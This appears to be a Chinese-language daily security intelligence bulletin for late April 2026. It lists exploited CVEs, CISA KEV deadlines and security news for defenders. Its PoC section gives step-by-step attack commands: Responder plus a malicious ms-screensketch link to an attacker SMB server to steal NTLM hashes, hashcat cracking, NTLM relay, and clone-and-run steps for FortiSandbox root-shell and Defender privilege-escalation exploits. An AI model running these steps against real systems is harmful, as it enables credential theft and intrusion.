每日安全情报报告 · 2026-04-24报告日期2026年4月24日周五情报窗口近 24-48 小时⚠️本报告包含在野利用漏洞请相关系统管理员立即核查并修复一、最新高危漏洞 严重Critical1. CVE-2026-23751 — Kofax CaptureTungsten Capture未授权 RCE项目详情CVE编号CVE-2026-23751CVSS评分9.8严重漏洞类型.NET Remoting 对象反序列化远程代码执行受影响组件Kofax Capture现 Tungsten Capture6.0.0.0攻击条件无需认证端口 2424 网络可达即可利用状态2026-04-23 披露暂无补丁漏洞描述Kofax Capture 在端口 2424 上暴露了已弃用的 .NET Remoting HTTP 通道使用默认公开的端点标识符且对反序列化对象存在固有信任允许未经认证的远程攻击者通过构造恶意 .NET Remoting 对象实现任意文件读写、NTLMv2 认证劫持和远程代码执行。影响范围任意文件读取/写入、NTLMv2 凭证窃取、远程代码执行、横向移动参考链接NVD 详情 | GitHub Advisory | TheHackerWire 分析2. CVE-2026-20122 — Cisco Catalyst SD-WAN Manager 特权 API 滥用项目详情CVE编号CVE-2026-20122CVSS评分未公开预估严重漏洞类型特权 API 错误使用受影响组件Cisco Catalyst SD-WAN Manager状态⚠️在野利用中CISA KEV 2026-04-20 新增参考链接CISA KEV 公告 | Cisco 安全公告3. CVE-2026-20128 — Cisco Catalyst SD-WAN Manager 密码可恢复存储项目详情CVE编号CVE-2026-20128CVSS评分未公开预估严重漏洞类型密码以可恢复格式存储CWE-257受影响组件Cisco Catalyst SD-WAN Manager状态⚠️在野利用中CISA KEV 2026-04-20 新增参考链接CISA KEV 公告4. CVE-2026-20133 — Cisco Catalyst SD-WAN Manager 敏感信息泄露项目详情CVE编号CVE-2026-20133CVSS评分6.5中等漏洞类型敏感信息泄露受影响组件Cisco Catalyst SD-WAN Manager状态⚠️在野利用中CISA KEV 2026-04-20 新增联邦修复截止日2026-04-24今日特别提醒CISA 已下发 4 天紧急指令ED 26-03要求联邦机构于今日4月24日前完成修复。CISA 确认三个 Cisco SD-WAN 漏洞正被攻击者积极利用攻击者可利用认证绕过实现初始访问再通过权限提升获取 Root 权限。参考链接CISA KEV 公告 | BleepingComputer 报道 | Hexnode 分析 高危High5. CVE-2023-27351 — PaperCut NG/MF 未认证 RCE项目详情CVE编号CVE-2023-27351CVSS评分8.2高危漏洞类型身份验证不当 → 远程代码执行受影响组件PaperCut NG/MF状态⚠️在野大规模利用中CISA KEV 2026-04-20 新增联邦截止2026-05-04参考链接CISA KEV 公告6. CVE-2024-27199 — JetBrains TeamCity 路径遍历项目详情CVE编号CVE-2024-27199CVSS评分7.3高危漏洞类型相对路径遍历受影响组件JetBrains TeamCity状态⚠️在野利用中CISA KEV 2026-04-20 新增联邦截止2026-05-04参考链接CISA KEV 公告7. CVE-2025-32975 — Quest KACE SMA 认证绕过项目详情CVE编号CVE-2025-32975漏洞类型身份验证不当受影响组件Quest KACE Systems Management Appliance状态⚠️在野利用中CISA KEV 2026-04-20 新增参考链接CISA KEV 公告8. CVE-2025-48700 — Synacor Zimbra 零点击 XSS项目详情CVE编号CVE-2025-48700漏洞类型零点击跨站脚本Zero-Click XSS受影响组件Synacor Zimbra Collaboration Suite (ZCS)状态⚠️在野利用中CISA KEV 2026-04-20 新增参考链接CISA KEV 公告9. CVE-2025-2749 — Kentico Xperience 路径遍历项目详情CVE编号CVE-2025-2749漏洞类型路径遍历受影响组件Kentico Xperience状态⚠️在野利用中CISA KEV 2026-04-20 新增参考链接CISA KEV 公告10. CVE-2026-33829 — Windows Snipping Tool NTLM 哈希泄露项目详情CVE编号CVE-2026-33829CVSS评分4.3中等实际风险更高漏洞类型信息泄露 / 网络欺骗受影响组件Windows 10/11 Snipping Tool31 个平台变体攻击条件无需权限仅需用户点击恶意链接状态2026-04-14 已修复PoC 已公开漏洞描述Windows Snipping Tool 注册的ms-screensketch自定义 URL 协议未正确验证filePath参数。攻击者构造恶意链接如ms-screensketch:filePath\\attacker-server\image.png诱导用户点击后Snipping Tool 会向攻击者控制的 SMB 服务器发起 NTLM 认证窃取 Net-NTLM 哈希。攻击者可离线破解密码或利用 NTLM Relay 进行横向移动。参考链接NVD 详情 | Hoplon InfoSec 技术分析 | FreeBuf 报道11. CVE-2026-39808 — FortiSandbox 未授权命令注入 RCE项目详情CVE编号CVE-2026-39808CVSS评分9.1严重漏洞类型未授权命令注入远程代码执行受影响组件Fortinet FortiSandbox状态⚠️在野利用中PoC 已公开GitHub: samu-delucas参考链接CyberSecurityNews 报道 | The Hacker Wire12. CVE-2026-33825 — Windows Defender BlueHammer 提权零日项目详情CVE编号CVE-2026-33825CVSS评分7.8高危漏洞类型TOCTOU 本地权限提升受影响组件Microsoft Defender for Endpoint状态⚠️在野利用中CISA KEVPoC 已公开BlueHammer RedSun参考链接CyberPress 报道 | Cyderes 分析13. CVE-2026-32201 — Microsoft SharePoint 欺骗零日项目详情CVE编号CVE-2026-32201CVSS评分6.5中等漏洞类型欺骗Spoofing受影响组件Microsoft SharePoint Server状态⚠️在野利用中CISA KEV联邦截止2026-04-28参考链接Tenable 分析14. CVE-2026-5760 — SGLang SSTI 远程代码执行项目详情CVE编号CVE-2026-5760CVSS评分9.8严重漏洞类型服务器端模板注入SSTI→ RCE受影响组件SGLang AI 框架攻击方式加载恶意 GGUF 模型触发 Jinja2 SSTI状态PoC 已公开参考链接GitHub PoC | CSDN 昨日报告二、最新漏洞 PoC1. CVE-2026-33829 — Windows Snipping Tool NTLM 哈希泄露 PoC风险等级 高CVSS 4.3但实际利用门槛极低PoC 发布者Black Arrow SecurityMarcos Díaz攻击原理利用 Windows Snipping Tool 的ms-screensketch自定义协议处理器通过构造恶意 URI 诱导用户点击触发目标主机向攻击者控制的 SMB 服务器发起 NTLM 认证静默窃取 Net-NTLM 哈希。使用步骤# 步骤 1搭建恶意 SMB 服务器使用 Impacket Responder sudo python3 responder.py -I eth0 -wrf # 步骤 2构造恶意链接 # ms-screensketch:filePath\\\\你的服务器IP\\image.png # 步骤 3通过钓鱼邮件/网页投递恶意链接 # 受害者点击后Responder 自动捕获 NTLM 哈希 # 步骤 4离线破解哈希 hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt # 步骤 5可选NTLM Relay 横向移动 python3 ntlmrelayx.py -tf targets.txt -smb2support参考链接Hoplon InfoSec 详细分析 | FreeBuf 报道 | VPNCentral 报道2. CVE-2026-39808 — FortiSandbox 未授权命令注入 PoC风险等级 严重CVSS 9.1在野利用PoC 来源GitHub samu-delucas漏洞概述Fortinet FortiSandbox 存在未授权命令注入漏洞攻击者无需任何登录凭证即可以 Root 权限执行任意操作系统命令。使用步骤# 步骤 1克隆 PoC 仓库 git clone https://github.com/samu-delucas/CVE-2026-39808.git cd CVE-2026-39808 # 步骤 2安装依赖 pip3 install -r requirements.txt # 步骤 3运行漏洞利用脚本 # 用法python3 exploit.py target_ip python3 exploit.py 192.168.1.100 # 攻击者将获得目标 FortiSandbox 的 Root Shell参考链接CyberSecurityNews 报道 | GitHub PoC 仓库3. CVE-2026-33825 — Windows Defender BlueHammer / RedSun 提权 PoC风险等级 严重CVSS 7.8在野利用影响 10 亿设备PoC 来源GitHub Nightmare-EclipseChaotic Eclipse漏洞概述利用 Windows Defender 的 TOCTOUTime-of-Check-Time-of-Use竞态条件实现从普通用户到 SYSTEM 权限的本地提权。BlueHammer 和 RedSun 是两个独立的 PoC 实现已被攻击者在野联合利用。使用步骤# 步骤 1克隆 BlueHammer PoC git clone https://github.com/Nightmare-Eclipse/BlueHammer.git cd BlueHammer # 步骤 2编译利用程序 # 或使用预编译的 release 版本 # 注意需要在目标 Windows 系统上以普通用户权限运行 # 步骤 3执行提权 # 运行后将在竞态条件窗口中替换 Defender 的敏感文件 # 成功后获得 SYSTEM 权限的 cmd.exe # RedSun PoC替代方案 git clone https://github.com/Nightmare-Eclipse/RedSun.git cd RedSun # 同样以普通用户权限运行即可触发提权参考链接Cyderes BlueHammer 分析 | CyberPress 报道 | Black Swan 威胁通告4. CVE-2026-23751 — Kofax Capture 未授权 RCE暂无公开 PoC风险等级 严重CVSS 9.8无需认证PoC 状态截至发稿暂无公开 PoC但漏洞利用技术成熟.NET Remoting 反序列化攻击原理连接目标端口 2424 的 .NET Remoting HTTP 通道利用反序列化实例化远程System.Net.WebClient对象实现任意文件读写和远程代码执行。参考链接NVD 详情 | TheHackerWire 技术分析三、网络安全最新文章1. Bitwarden CLI 遭 Checkmarx 供应链攻击入侵来源The Hacker News / Socket / JFrog |日期2026-04-23摘要密码管理器 Bitwarden 的 CLI 工具遭 Checkmarx 供应链攻击活动入侵。攻击者通过投毒的 GitHub Actions 工作流在bitwarden/cli2026.4.0版本中注入恶意代码bw1.js。恶意包在 npm 上仅存活 93 分钟17:57-19:30 EDT但已足以造成影响。恶意载荷具备窃取 GitHub 令牌、云服务凭证、SSH 密钥等能力并能蠕虫式传播至其他 CI/CD 管道。Bitwarden 已确认用户保险库数据未被访问。标签#供应链攻击#Bitwarden#Checkmarx#CI/CD安全阅读原文 | Socket 分析 | CyberInsider 报道2. CISA 新增 8 个在野利用漏洞Cisco SD-WAN 三洞齐爆来源The Hacker News / CISA 官方 |日期2026-04-22摘要CISA 于 4 月 20 日紧急新增 8 个在野利用漏洞至 KEV 目录其中 3 个 Cisco Catalyst SD-WAN Manager 漏洞CVE-2026-20122/20128/20133被设为 72 小时紧急修复截止4月23日。其余 5 个漏洞覆盖 PaperCut、JetBrains TeamCity、Kentico Xperience、Quest KACE 和 Zimbra截止日期为 5 月 4 日。CISA 同时更新紧急指令 ED 26-03要求联邦机构立即排查 SD-WAN 系统安全性。标签#CISA#KEV#Cisco#SD-WAN#联邦安全阅读原文 | CISA 官方公告 | iSecNews 报道3. Oracle 4 月关键补丁更新修复 481 个安全漏洞来源Qualys / Tenable / Oracle 官方 |日期2026-04-22摘要Oracle 发布 2026 年第二季度关键补丁更新CPU共修复481 个安全漏洞对应约 450 个唯一 CVE覆盖 28 个产品系列。其中超过 300 个漏洞允许远程攻击者在无需认证的情况下入侵系统。Oracle E-Business Suite 收到 18 个补丁8 个可远程利用Oracle Fusion Middleware、数据库和 Java 也包含大量关键修复。Qualys 建议企业优先修补面向互联网的系统。标签#Oracle#CPU#补丁更新#企业安全阅读原文 | Oracle 官方公告 | Tenable 分析4. Anthropic 发布 Claude Opus 4.7搭载自动化网络安全防护机制来源Anthropic / HelpNetSecurity |日期2026-04-20摘要Anthropic 正式发布 Claude Opus 4.7 模型在软件工程、视觉理解和指令遵循方面显著提升。该模型首次集成了自动化网络安全防护机制可与 Project Glasswing 计划协同运作。与此同时Anthropic 的安全研究项目 Mythos 也在持续推进此前已展示 AI 独立发现并利用零日漏洞的能力引发安全圈关于漏洞末日的广泛讨论。标签#Anthropic#Claude#AI安全#漏洞发现阅读原文 | HelpNetSecurity 报道5. Windows Snipping Tool NTLM 哈希泄露漏洞 PoC 公开来源FreeBuf / Hoplon InfoSec |日期2026-04-21摘要安全研究人员公开了 Windows 截图工具Snipping Tool漏洞 CVE-2026-33829 的完整 PoC。该漏洞利用ms-screensketch协议的输入验证缺陷攻击者仅需诱导用户点击恶意链接即可窃取 Net-NTLM 哈希。微软已在 4 月 Patch Tuesday 中修复该漏洞但 PoC 公开后利用门槛极低企业环境需特别关注。攻击者可利用泄露的哈希进行密码破解或 NTLM Relay 横向移动。标签#Windows#NTLM#SnippingTool#凭据窃取阅读原文 | Hoplon InfoSec 技术分析 | 腾讯新闻6. Foresiet 报告6 起 AI 安全攻击事件完整攻击路径分析来源Foresiet |日期2026-04-21摘要安全研究机构 Foresiet 发布 2026 年 4 月 AI 安全事件分析报告详细剖析了 6 起重大 AI 安全攻击事件的完整攻击路径涵盖 AI Agent 数据泄露、全球恶意软件活动、AI 模型利用等场景。报告显示 AI 驱动的网络攻击同比增长 89%漏洞利用时间已从 2018 年的 756 天压缩至不足 24 小时28.3% 的已利用漏洞在披露当天即遭攻击。标签#AI攻击#威胁情报#攻击分析阅读原文7. Docker 授权绕过漏洞影响宿主机安全来源CNVD / 安全社区 |日期2026-04-20摘要CNVD 收录了一个 Docker Engine AuthZ 插件绕过漏洞攻击者可绕过 Docker 的授权机制获取宿主机控制权。该漏洞是 CVE-2024-41110 修复不完整导致的回归问题影响使用自定义授权插件AuthZ的 Docker 部署环境。建议运维团队立即检查 Docker 版本并升级至最新稳定版。标签#Docker#容器安全#权限绕过阅读原文四、今日重点关注优先级漏洞/事件理由P0CVE-2026-20122/20128/20133Cisco SD-WAN在野利用 CISA 紧急指令今日修复截止P0Bitwarden CLI 供应链攻击密码管理器被植入后门检查 CI/CD 管道P1CVE-2026-23751Kofax CaptureCVSS 9.8无需认证 RCE暂无补丁P1CVE-2023-27351PaperCut在野大规模利用CISA KEVP1CVE-2026-33829Snipping Tool NTLMPoC 公开利用门槛极低P2CVE-2026-39808FortiSandbox在野利用 PoC 公开P2Oracle 4 月 CPU481 个漏洞优先修补面向互联网的系统五、CISA KEV 联邦修复截止日历截止日期CVE产品2026-04-24今日CVE-2026-20122, CVE-2026-20128, CVE-2026-20133Cisco Catalyst SD-WAN Manager2026-04-28CVE-2026-32201Microsoft SharePoint Server2026-05-04CVE-2023-27351, CVE-2024-27199, CVE-2025-2749, CVE-2025-32975, CVE-2025-48700PaperCut / TeamCity / Kentico / KACE / Zimbra免责声明本报告仅供安全研究和防御参考。漏洞信息来源于公开渠道CISA、NVD、The Hacker News、GitHub、FreeBuf 等请勿用于非法用途。如有遗漏或错误欢迎指正。数据来源CISA KEV Catalog、NVD/NIST、The Hacker News、FreeBuf、安全客、GitHub、Qualys、Tenable、Hoplon InfoSec、CyberInsider、Foresiet、CNVD